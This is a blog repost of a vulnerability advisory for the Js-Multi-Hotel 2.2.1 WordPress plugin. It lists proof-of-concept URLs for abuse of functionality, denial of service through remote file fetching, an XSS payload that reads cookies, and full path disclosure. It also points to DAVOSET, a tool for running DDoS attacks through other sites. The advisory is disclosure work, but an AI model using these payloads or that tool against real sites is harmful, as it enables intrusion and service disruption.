最新消息:
    你的位置:jinglingshu的博客 > wordpress > WordPress Js-Multi-Hotel 2.2.1 XSS / DoS漏洞

    WordPress Js-Multi-Hotel 2.2.1 XSS / DoS漏洞

    wordpress admin 2419浏览 0评论

    Hello list!

    There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress.
    Earlier I wrote about two other vulnerabilities.

    These are Abuse of Functionality, Denial of Service, Cross-Site Scripting
    and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for
    WordPress. There are much more vulnerabilities in this plugin (including
    dangerous holes), so after two advisories I”ll write new advisories.

    ————————-
    Affected products:
    ————————-

    Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.

    ————————-
    Affected vendors:
    ————————-

    Joomlaskin
    http://www.joomlaskin.it

    ————————-
    Affected products:
    ————————-

    Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.

    ———-
    Details:
    ———-

    Abuse of Functionality (WASC-42):

    http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site&w=1&h=1

    DoS (WASC-10):

    http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site/big_file&h=1&w=1

    Besides conducting DoS attack manually, it”s also possible to conduct
    automated DoS and DDoS attacks with using of DAVOSET
    (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).

    DDoS attacks via other sites execution tool:
    http://websecurity.com.ua/davoset/

    Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I

    Cross-Site Scripting (WASC-08):

    http://www.sitedirsec.com/wp-content/plugins/js-multihotel/includes/delete_img.php?path=%3Cbody%20onload=with(document)alert(cookie)%3E

    About XSS vulnerability in refreshDate.php in parameter roomid there was
    written earlier
    (http://packetstormsecurity.com/files/124239/WordPress-Js-Multi-Hotel-2.2.1-Cross-Site-Scripting.html).

    Full path disclosure (WASC-13):

    http://site/wp-content/plugins/js-multihotel/includes/functions.php

    http://site/wp-content/plugins/js-multihotel/includes/myCalendar.php

    http://site/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=

    http://site/wp-content/plugins/js-multihotel/includes/show_image.php

    http://site/wp-content/plugins/js-multihotel/includes/widget.php

    http://site/wp-content/plugins/js-multihotel/includes/phpthumb/GdThumb.inc.php

    http://site/wp-content/plugins/js-multihotel/includes/phpthumb/thumb_plugins/gd_reflection.inc.php

    I wrote about these vulnerabilities at my site
    (http://websecurity.com.ua/7087/).

    Best wishes & regards,
    MustLive
    Administrator of Websecurity web site
    http://websecurity.com.ua

    转载请注明:jinglingshu的博客 » WordPress Js-Multi-Hotel 2.2.1 XSS / DoS漏洞

    与本文相关的文章

    发表我的评论
    取消评论

    表情

    Hi,您需要填写昵称和邮箱!

    • 昵称 (必填)
    • 邮箱 (必填)
    • 网址